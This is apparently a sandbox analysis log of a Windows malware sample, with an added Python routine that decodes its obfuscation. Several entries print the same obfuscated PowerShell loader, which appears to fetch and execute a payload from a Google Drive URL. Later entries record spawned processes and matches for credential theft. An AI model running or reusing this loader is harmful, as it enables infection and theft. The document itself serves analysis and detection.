Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Finindstillingernes119.Uni && echo $"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Ricki = 1;$Gehenna='Substrin';$Gehenna+='g';Function Quillaia($Overbevokser){$Feasibilities=$Overbevokser.Length-$Ricki;For($Kompeni=5; $Kompeni -lt $Feasibilities; $Kompeni+=(6)){$Fortrnelse+=$Overbevokser.$Gehenna.Invoke($Kompeni, $Ricki);}$Fortrnelse;}function Standglas249($Babbittess){. ($Uti) ($Babbittess);}$Usheen=Quillaia ' S.bcM Autoo,roomzA,uatiPreenlUdspil emieaM.cov/Toakt5Ethno. Org,0Kille Het,r(EgetfW SelviNedrunSt nidva.ieogunvaw Brugsisbje propeNTidsfTAgter Stdta1Scale0Ma em.Spu.g0Rensn;A ver B,dedWUrpr,iWoundn Sprn6Hex n4Sub,e; c.to Az.mexSvine6k evr4 Non.;Perso Viruera,tndv Han,:Store1 horo2F ret1 oeme. opti0Inten)Skerr ForkrGSept,eSelebc histkLe,lio As,r/ Inhe2Tailz0Efter1.ndos0.euro0Overb1Bund 0,arav1Ore,t OperFL.udai SprurSto,ve,traafSlavio,earax .hot/ Udsu1 Eger2 Me.l1Krabd.Spinu0Maedt ';$Bogholdersker=Quillaia 'ForbiUOscilsadr.seGangwrBevat- h,ldATheurgPi kyeSemidnKrilrt Ly p ';$Fint=Quillaia 'NondihBlockt ReintEtmaapInsers Indf:Inter/defo /T pvodFryserUn aciTilb vSysseeExecr.Kurs gberr oAdfrdo Loo.gInconlAf aleGabes. .lotc Ant o SuccmGodhj/TermouMoun.cTermo?maletefo,grxNo.cupInconoCensur.ejebtBarra=apraxd pulvocohenwHan.knHol bl I.froCaseaaHyr,sdPol r&Ar,npiTrichdBestr= Gar,1Unmo oArbejD FugtjLsead9Univei Po,c8SubbabFilat8 egngBrnefDFu,le7Adspu4BordvVAr.hdU ockac.abenOGamel_Samme0Tiltrm PaynAArb.taF.rreRSkulkxUnmusSVildfOAn,ipZSmithj KorrE l,efISu.pkNU derBNucul5 Burm ';$Observandernes=Quillaia ' Gna >Stand ';$Uti=Quillaia 'DialaiM,ddeePr.dexNonex ';$Akkumulerede = Quillaia 'SkaffeNar,ocDatamhCathoou,ali Fanem%MedisaRetsgpAlligpEjersd ,maaaIndsttKomb a Meta%U,all\ LoenFWagneiTraktnTys,li PillnGinesd forssisoagt El viOve slFrilslArsh,iRetran KursgTeksteProkurUnifan Prece,eklasUd,ap1Wa,py1B tte9 Dext.ArikoU outpnAfkaliIdeal Ne,tb&F,rbi&Flamm ozaeeFiresc St,chfiguro lede Illog$Ulovm ';Standglas249 (Quillaia ' Cent$Amidog .luklY,ereogarnibRetrtaN,nirlUdate:org.nR echrerekinsPreapiKonjagHe nenMa.emeHogmorSlagte,appanpomeld.senseEgn,rsIn,ri=Ndraa( NatucF,jtimKunstd Bvre kants/ Un,oc Fic, Yemen$ Stv,AKravekTnneskKombiuFidusmlejrsuCardiltrykkeMinj rAccoueSkrivd doupeAroma)Pal,o ');Standglas249 (Quillaia ' Mask$Admirg R.shlQuarto Unrib S.deaDansel Fork: NummPReachrGlazef M.llaValgrbDiphtrGenkeiL.viskUnseneVugger,rnne=Learn$JernbFChalliKhevznUdsigtSkull. HressWolffp Un,rl UbndiStjertMa,ri(Tapet$Do,laORringb Ge,ts.nasseAk,usrRvhulvPanoraYnglen RecldFremfeZernerPsychn almueU.loosDispe)Ermel ');$Fint=$Prfabriker[0];Standglas249 (Quillaia ' Akti$actingUnderlJackpo Fidgb OptiaP mphl Pira: baanR Mde.eHejrepTilsla Lejei SkelnOve,dtuncomeCasanrderivsEti.l=FlskeNVo ubenoncuw Ho n- MethOVoldgbEf erjThyr,esen ocBin.itExtra S.cerS Egnsy Ide,sforkatHyrevemot vmchaut. UdslNBro zeHollytJuv l.GvestW ecome BrofbunlooCIncarl UdbyiFreere,aglynSpdbrtUdvik ');Standglas249 (Quillaia 'Psal.$,avshR .krieProtopTerroaCoyotiMovabnBej,st p
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Finindstillingernes119.Uni && echo $" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" Jump to behavior
Source: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe Process created: C:\Windows\SysWOW64\openfiles.exe "C:\Windows\SysWOW64\openfiles.exe" Jump to behavior
Source: C:\Windows\SysWOW64\openfiles.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe" Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$ricki = 1;$gehenna='substrin';$gehenna+='g';function quillaia($overbevokser){$feasibilities=$overbevokser.length-$ricki;for($kompeni=5; $kompeni -lt $feasibilities; $kompeni+=(6)){$fortrnelse+=$overbevokser.$gehenna.invoke($kompeni, $ricki);}$fortrnelse;}function standglas249($babbittess){. ($uti) ($babbittess);}$usheen=quillaia ' s.bcm autoo,roomza,uatipreenludspil emieam.cov/toakt5ethno. org,0kille het,r(egetfw selvinedrunst nidva.ieogunvaw brugsisbje propentidsftagter stdta1scale0ma em.spu.g0rensn;a ver b,dedwurpr,iwoundn sprn6hex n4sub,e; c.to az.mexsvine6k evr4 non.;perso viruera,tndv han,:store1 horo2f ret1 oeme. opti0inten)skerr forkrgsept,eselebc histkle,lio as,r/ inhe2tailz0efter1.ndos0.euro0overb1bund 0,arav1ore,t operfl.udai sprursto,ve,traafslavio,earax .hot/ udsu1 eger2 me.l1krabd.spinu0maedt ';$bogholdersker=quillaia 'forbiuoscilsadr.segangwrbevat- h,ldatheurgpi kyesemidnkrilrt ly p ';$fint=quillaia 'nondihblockt reintetmaapinsers indf:inter/defo /t pvodfryserun acitilb vsysseeexecr.kurs gberr oadfrdo loo.ginconlaf alegabes. 
.lotc ant o succmgodhj/termoumoun.ctermo?maletefo,grxno.cupinconocensur.ejebtbarra=apraxd pulvocohenwhan.knhol bl i.frocaseaahyr,sdpol r&ar,npitrichdbestr= gar,1unmo oarbejd fugtjlsead9univei po,c8subbabfilat8 egngbrnefdfu,le7adspu4bordvvar.hdu ockac.abenogamel_samme0tiltrm paynaarb.taf.rrerskulkxunmussvildfoan,ipzsmithj korre l,efisu.pknu derbnucul5 burm ';$observandernes=quillaia ' gna >stand ';$uti=quillaia 'dialaim,ddeepr.dexnonex ';$akkumulerede = quillaia 'skaffenar,ocdatamhcathoou,ali fanem%medisaretsgpalligpejersd ,maaaindsttkomb a meta%u,all\ loenfwagneitraktntys,li pillnginesd forssisoagt el viove slfrilslarsh,iretran kursgteksteprokurunifan prece,eklasud,ap1wa,py1b tte9 dext.arikou outpnafkaliideal ne,tb&f,rbi&flamm ozaeefiresc st,chfiguro lede illog$ulovm ';standglas249 (quillaia ' cent$amidog .lukly,ereogarnibretrtan,nirludate:org.nr echrerekinspreapikonjaghe nenma.emehogmorslagte,appanpomeld.senseegn,rsin,ri=ndraa( natucf,jtimkunstd bvre kants/ un,oc fic, yemen$ stv,akravektnneskkombiufidusmlejrsucardiltrykkeminj raccoueskrivd doupearoma)pal,o ');standglas249 (quillaia ' mask$admirg r.shlquarto unrib s.deadansel fork: nummpreachrglazef m.llavalgrbdiphtrgenkeil.viskunsenevugger,rnne=learn$jernbfchallikhevznudsigtskull. hresswolffp un,rl ubndistjertma,ri(tapet$do,laorringb ge,ts.nasseak,usrrvhulvpanoraynglen recldfremfezernerpsychn almueu.loosdispe)ermel ');$fint=$prfabriker[0];standglas249 (quillaia ' akti$actingunderljackpo fidgb optiap mphl pira: baanr mde.ehejreptilsla lejei skelnove,dtuncomecasanrderivseti.l=flskenvo ubenoncuw ho n- methovoldgbef erjthyr,esen ocbin.itextra s.cers egnsy ide,sforkathyrevemot vmchaut. udslnbro zehollytjuv l.gvestw ecome brofbunloocincarl udbyifreere,aglynspdbrtudvik ');standglas249 (quillaia 'psal.$,avshr .krieprotopterroacoyotimovabnbej,st p
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$ricki = 1;$gehenna='substrin';$gehenna+='g';function quillaia($overbevokser){$feasibilities=$overbevokser.length-$ricki;for($kompeni=5; $kompeni -lt $feasibilities; $kompeni+=(6)){$fortrnelse+=$overbevokser.$gehenna.invoke($kompeni, $ricki);}$fortrnelse;}function standglas249($babbittess){. ($uti) ($babbittess);}$usheen=quillaia ' s.bcm autoo,roomza,uatipreenludspil emieam.cov/toakt5ethno. org,0kille het,r(egetfw selvinedrunst nidva.ieogunvaw brugsisbje propentidsftagter stdta1scale0ma em.spu.g0rensn;a ver b,dedwurpr,iwoundn sprn6hex n4sub,e; c.to az.mexsvine6k evr4 non.;perso viruera,tndv han,:store1 horo2f ret1 oeme. opti0inten)skerr forkrgsept,eselebc histkle,lio as,r/ inhe2tailz0efter1.ndos0.euro0overb1bund 0,arav1ore,t operfl.udai sprursto,ve,traafslavio,earax .hot/ udsu1 eger2 me.l1krabd.spinu0maedt ';$bogholdersker=quillaia 'forbiuoscilsadr.segangwrbevat- h,ldatheurgpi kyesemidnkrilrt ly p ';$fint=quillaia 'nondihblockt reintetmaapinsers indf:inter/defo /t pvodfryserun acitilb vsysseeexecr.kurs gberr oadfrdo loo.ginconlaf alegabes. 
.lotc ant o succmgodhj/termoumoun.ctermo?maletefo,grxno.cupinconocensur.ejebtbarra=apraxd pulvocohenwhan.knhol bl i.frocaseaahyr,sdpol r&ar,npitrichdbestr= gar,1unmo oarbejd fugtjlsead9univei po,c8subbabfilat8 egngbrnefdfu,le7adspu4bordvvar.hdu ockac.abenogamel_samme0tiltrm paynaarb.taf.rrerskulkxunmussvildfoan,ipzsmithj korre l,efisu.pknu derbnucul5 burm ';$observandernes=quillaia ' gna >stand ';$uti=quillaia 'dialaim,ddeepr.dexnonex ';$akkumulerede = quillaia 'skaffenar,ocdatamhcathoou,ali fanem%medisaretsgpalligpejersd ,maaaindsttkomb a meta%u,all\ loenfwagneitraktntys,li pillnginesd forssisoagt el viove slfrilslarsh,iretran kursgteksteprokurunifan prece,eklasud,ap1wa,py1b tte9 dext.arikou outpnafkaliideal ne,tb&f,rbi&flamm ozaeefiresc st,chfiguro lede illog$ulovm ';standglas249 (quillaia ' cent$amidog .lukly,ereogarnibretrtan,nirludate:org.nr echrerekinspreapikonjaghe nenma.emehogmorslagte,appanpomeld.senseegn,rsin,ri=ndraa( natucf,jtimkunstd bvre kants/ un,oc fic, yemen$ stv,akravektnneskkombiufidusmlejrsucardiltrykkeminj raccoueskrivd doupearoma)pal,o ');standglas249 (quillaia ' mask$admirg r.shlquarto unrib s.deadansel fork: nummpreachrglazef m.llavalgrbdiphtrgenkeil.viskunsenevugger,rnne=learn$jernbfchallikhevznudsigtskull. hresswolffp un,rl ubndistjertma,ri(tapet$do,laorringb ge,ts.nasseak,usrrvhulvpanoraynglen recldfremfezernerpsychn almueu.loosdispe)ermel ');$fint=$prfabriker[0];standglas249 (quillaia ' akti$actingunderljackpo fidgb optiap mphl pira: baanr mde.ehejreptilsla lejei skelnove,dtuncomecasanrderivseti.l=flskenvo ubenoncuw ho n- methovoldgbef erjthyr,esen ocbin.itextra s.cers egnsy ide,sforkathyrevemot vmchaut. udslnbro zehollytjuv l.gvestw ecome brofbunloocincarl udbyifreere,aglynspdbrtudvik ');standglas249 (quillaia 'psal.$,avshr .krieprotopterroacoyotimovabnbej,st p
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$ricki = 1;$gehenna='substrin';$gehenna+='g';function quillaia($overbevokser){$feasibilities=$overbevokser.length-$ricki;for($kompeni=5; $kompeni -lt $feasibilities; $kompeni+=(6)){$fortrnelse+=$overbevokser.$gehenna.invoke($kompeni, $ricki);}$fortrnelse;}function standglas249($babbittess){. ($uti) ($babbittess);}$usheen=quillaia ' s.bcm autoo,roomza,uatipreenludspil emieam.cov/toakt5ethno. org,0kille het,r(egetfw selvinedrunst nidva.ieogunvaw brugsisbje propentidsftagter stdta1scale0ma em.spu.g0rensn;a ver b,dedwurpr,iwoundn sprn6hex n4sub,e; c.to az.mexsvine6k evr4 non.;perso viruera,tndv han,:store1 horo2f ret1 oeme. opti0inten)skerr forkrgsept,eselebc histkle,lio as,r/ inhe2tailz0efter1.ndos0.euro0overb1bund 0,arav1ore,t operfl.udai sprursto,ve,traafslavio,earax .hot/ udsu1 eger2 me.l1krabd.spinu0maedt ';$bogholdersker=quillaia 'forbiuoscilsadr.segangwrbevat- h,ldatheurgpi kyesemidnkrilrt ly p ';$fint=quillaia 'nondihblockt reintetmaapinsers indf:inter/defo /t pvodfryserun acitilb vsysseeexecr.kurs gberr oadfrdo loo.ginconlaf alegabes. 
.lotc ant o succmgodhj/termoumoun.ctermo?maletefo,grxno.cupinconocensur.ejebtbarra=apraxd pulvocohenwhan.knhol bl i.frocaseaahyr,sdpol r&ar,npitrichdbestr= gar,1unmo oarbejd fugtjlsead9univei po,c8subbabfilat8 egngbrnefdfu,le7adspu4bordvvar.hdu ockac.abenogamel_samme0tiltrm paynaarb.taf.rrerskulkxunmussvildfoan,ipzsmithj korre l,efisu.pknu derbnucul5 burm ';$observandernes=quillaia ' gna >stand ';$uti=quillaia 'dialaim,ddeepr.dexnonex ';$akkumulerede = quillaia 'skaffenar,ocdatamhcathoou,ali fanem%medisaretsgpalligpejersd ,maaaindsttkomb a meta%u,all\ loenfwagneitraktntys,li pillnginesd forssisoagt el viove slfrilslarsh,iretran kursgteksteprokurunifan prece,eklasud,ap1wa,py1b tte9 dext.arikou outpnafkaliideal ne,tb&f,rbi&flamm ozaeefiresc st,chfiguro lede illog$ulovm ';standglas249 (quillaia ' cent$amidog .lukly,ereogarnibretrtan,nirludate:org.nr echrerekinspreapikonjaghe nenma.emehogmorslagte,appanpomeld.senseegn,rsin,ri=ndraa( natucf,jtimkunstd bvre kants/ un,oc fic, yemen$ stv,akravektnneskkombiufidusmlejrsucardiltrykkeminj raccoueskrivd doupearoma)pal,o ');standglas249 (quillaia ' mask$admirg r.shlquarto unrib s.deadansel fork: nummpreachrglazef m.llavalgrbdiphtrgenkeil.viskunsenevugger,rnne=learn$jernbfchallikhevznudsigtskull. hresswolffp un,rl ubndistjertma,ri(tapet$do,laorringb ge,ts.nasseak,usrrvhulvpanoraynglen recldfremfezernerpsychn almueu.loosdispe)ermel ');$fint=$prfabriker[0];standglas249 (quillaia ' akti$actingunderljackpo fidgb optiap mphl pira: baanr mde.ehejreptilsla lejei skelnove,dtuncomecasanrderivseti.l=flskenvo ubenoncuw ho n- methovoldgbef erjthyr,esen ocbin.itextra s.cers egnsy ide,sforkathyrevemot vmchaut. udslnbro zehollytjuv l.gvestw ecome brofbunloocincarl udbyifreere,aglynspdbrtudvik ');standglas249 (quillaia 'psal.$,avshr .krieprotopterroacoyotimovabnbej,st p Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$ricki = 1;$gehenna='substrin';$gehenna+='g';function quillaia($overbevokser){$feasibilities=$overbevokser.length-$ricki;for($kompeni=5; $kompeni -lt $feasibilities; $kompeni+=(6)){$fortrnelse+=$overbevokser.$gehenna.invoke($kompeni, $ricki);}$fortrnelse;}function standglas249($babbittess){. ($uti) ($babbittess);}$usheen=quillaia ' s.bcm autoo,roomza,uatipreenludspil emieam.cov/toakt5ethno. org,0kille het,r(egetfw selvinedrunst nidva.ieogunvaw brugsisbje propentidsftagter stdta1scale0ma em.spu.g0rensn;a ver b,dedwurpr,iwoundn sprn6hex n4sub,e; c.to az.mexsvine6k evr4 non.;perso viruera,tndv han,:store1 horo2f ret1 oeme. opti0inten)skerr forkrgsept,eselebc histkle,lio as,r/ inhe2tailz0efter1.ndos0.euro0overb1bund 0,arav1ore,t operfl.udai sprursto,ve,traafslavio,earax .hot/ udsu1 eger2 me.l1krabd.spinu0maedt ';$bogholdersker=quillaia 'forbiuoscilsadr.segangwrbevat- h,ldatheurgpi kyesemidnkrilrt ly p ';$fint=quillaia 'nondihblockt reintetmaapinsers indf:inter/defo /t pvodfryserun acitilb vsysseeexecr.kurs gberr oadfrdo loo.ginconlaf alegabes. 
.lotc ant o succmgodhj/termoumoun.ctermo?maletefo,grxno.cupinconocensur.ejebtbarra=apraxd pulvocohenwhan.knhol bl i.frocaseaahyr,sdpol r&ar,npitrichdbestr= gar,1unmo oarbejd fugtjlsead9univei po,c8subbabfilat8 egngbrnefdfu,le7adspu4bordvvar.hdu ockac.abenogamel_samme0tiltrm paynaarb.taf.rrerskulkxunmussvildfoan,ipzsmithj korre l,efisu.pknu derbnucul5 burm ';$observandernes=quillaia ' gna >stand ';$uti=quillaia 'dialaim,ddeepr.dexnonex ';$akkumulerede = quillaia 'skaffenar,ocdatamhcathoou,ali fanem%medisaretsgpalligpejersd ,maaaindsttkomb a meta%u,all\ loenfwagneitraktntys,li pillnginesd forssisoagt el viove slfrilslarsh,iretran kursgteksteprokurunifan prece,eklasud,ap1wa,py1b tte9 dext.arikou outpnafkaliideal ne,tb&f,rbi&flamm ozaeefiresc st,chfiguro lede illog$ulovm ';standglas249 (quillaia ' cent$amidog .lukly,ereogarnibretrtan,nirludate:org.nr echrerekinspreapikonjaghe nenma.emehogmorslagte,appanpomeld.senseegn,rsin,ri=ndraa( natucf,jtimkunstd bvre kants/ un,oc fic, yemen$ stv,akravektnneskkombiufidusmlejrsucardiltrykkeminj raccoueskrivd doupearoma)pal,o ');standglas249 (quillaia ' mask$admirg r.shlquarto unrib s.deadansel fork: nummpreachrglazef m.llavalgrbdiphtrgenkeil.viskunsenevugger,rnne=learn$jernbfchallikhevznudsigtskull. hresswolffp un,rl ubndistjertma,ri(tapet$do,laorringb ge,ts.nasseak,usrrvhulvpanoraynglen recldfremfezernerpsychn almueu.loosdispe)ermel ');$fint=$prfabriker[0];standglas249 (quillaia ' akti$actingunderljackpo fidgb optiap mphl pira: baanr mde.ehejreptilsla lejei skelnove,dtuncomecasanrderivseti.l=flskenvo ubenoncuw ho n- methovoldgbef erjthyr,esen ocbin.itextra s.cers egnsy ide,sforkathyrevemot vmchaut. udslnbro zehollytjuv l.gvestw ecome brofbunloocincarl udbyifreere,aglynspdbrtudvik ');standglas249 (quillaia 'psal.$,avshr .krieprotopterroacoyotimovabnbej,st p Jump to behavior
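Every string in the PowerShell command lines above is hidden behind `Quillaia`, which keeps one character out of every six (index 5, 11, 17, ... while the index is below `Length-1`) and discards the five filler characters before it; `Standglas249` then dot-sources each decoded fragment through `$Uti`, which decodes to `iex`. The following Python is an added example written for this page, not code from the report or from the loader; the function names, the `looks_intact` check and the encoder used for the round-trip are my own. The sample literals are transcribed from the command line above. A practitioner needs two checks: the `$Akkumulerede` literal should decode to exactly the cmd.exe command line recorded at the next entry (`echo %appdata%\Finindstillingernes119.Uni && echo $`), and any literal whose length is not a multiple of six has been damaged by the report rendering collapsing runs of spaces, which shifts the stride and garbles everything after the lost space.

```python
import re

# Offsets copied from the PowerShell above: $Kompeni starts at 5 and steps by 6,
# and the loop runs while $Kompeni -lt ($Overbevokser.Length - 1).
START, STRIDE = 5, 6


def quillaia_decode(blob: str, start: int = START, stride: int = STRIDE) -> str:
    """Python mirror of Quillaia: keep every `stride`-th character from `start`.
    The bound is len-1, not len, so the payload slot of the final pad chunk
    (always a space in this sample) is dropped."""
    return "".join(blob[i] for i in range(start, len(blob) - 1, stride))


def looks_intact(blob: str, stride: int = STRIDE) -> bool:
    """Integrity check (my own, not part of the loader): each literal is whole
    6-character chunks plus one pad chunk, so its length is a multiple of 6.
    The report rendering collapsed runs of spaces in some literals (the User
    Agent string and the echo command diverge from the recorded cmd.exe line
    exactly where a double space would sit); a length off the stride means the
    decode is unreliable from the first lost space onward."""
    return len(blob) % stride == 0


def decode_powershell_strings(script: str) -> list[str]:
    """Decode every Quillaia '...' literal in an obfuscated command line.
    The filler never contains a single quote in this sample, so a plain regex
    is enough; a variant that did would need a real tokenizer."""
    return [quillaia_decode(m)
            for m in re.findall(r"quillaia '([^']*)'", script, flags=re.IGNORECASE)]


def quillaia_encode(plain: str, filler: str = "abcde", stride: int = STRIDE) -> str:
    """Constructed inverse, used only to build round-trip test material."""
    pad = filler[: stride - 1]
    return "".join(pad + ch for ch in plain) + pad + " "


# Literals transcribed from the command line above. These three survived the
# rendering intact (length is a multiple of 6), so their decodes are exact.
SAMPLE_LITERALS = {
    "$Uti": "DialaiM,ddeePr.dexNonex ",
    "$Bogholdersker": "ForbiUOscilsadr.seGangwrBevat- h,ldATheurgPi kyeSemidnKrilrt Ly p ",
    "$Observandernes": " Gna >Stand ",
}

if __name__ == "__main__":
    for name, blob in SAMPLE_LITERALS.items():
        state = "ok" if looks_intact(blob) else "LENGTH OFF STRIDE, decode unreliable"
        print(f"{name:16} -> {quillaia_decode(blob)!r:14} [{state}]")
```

Run against a literal copied from the raw sandbox JSON or from the script file itself rather than from rendered HTML; the stride decoder has no redundancy, so one collapsed space silently shifts every later character.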
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information

Source: Yara match File source: 00000011.00000002.2753491610.00000000032F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2249406825.00000000026D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.2755502958.0000000002150000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
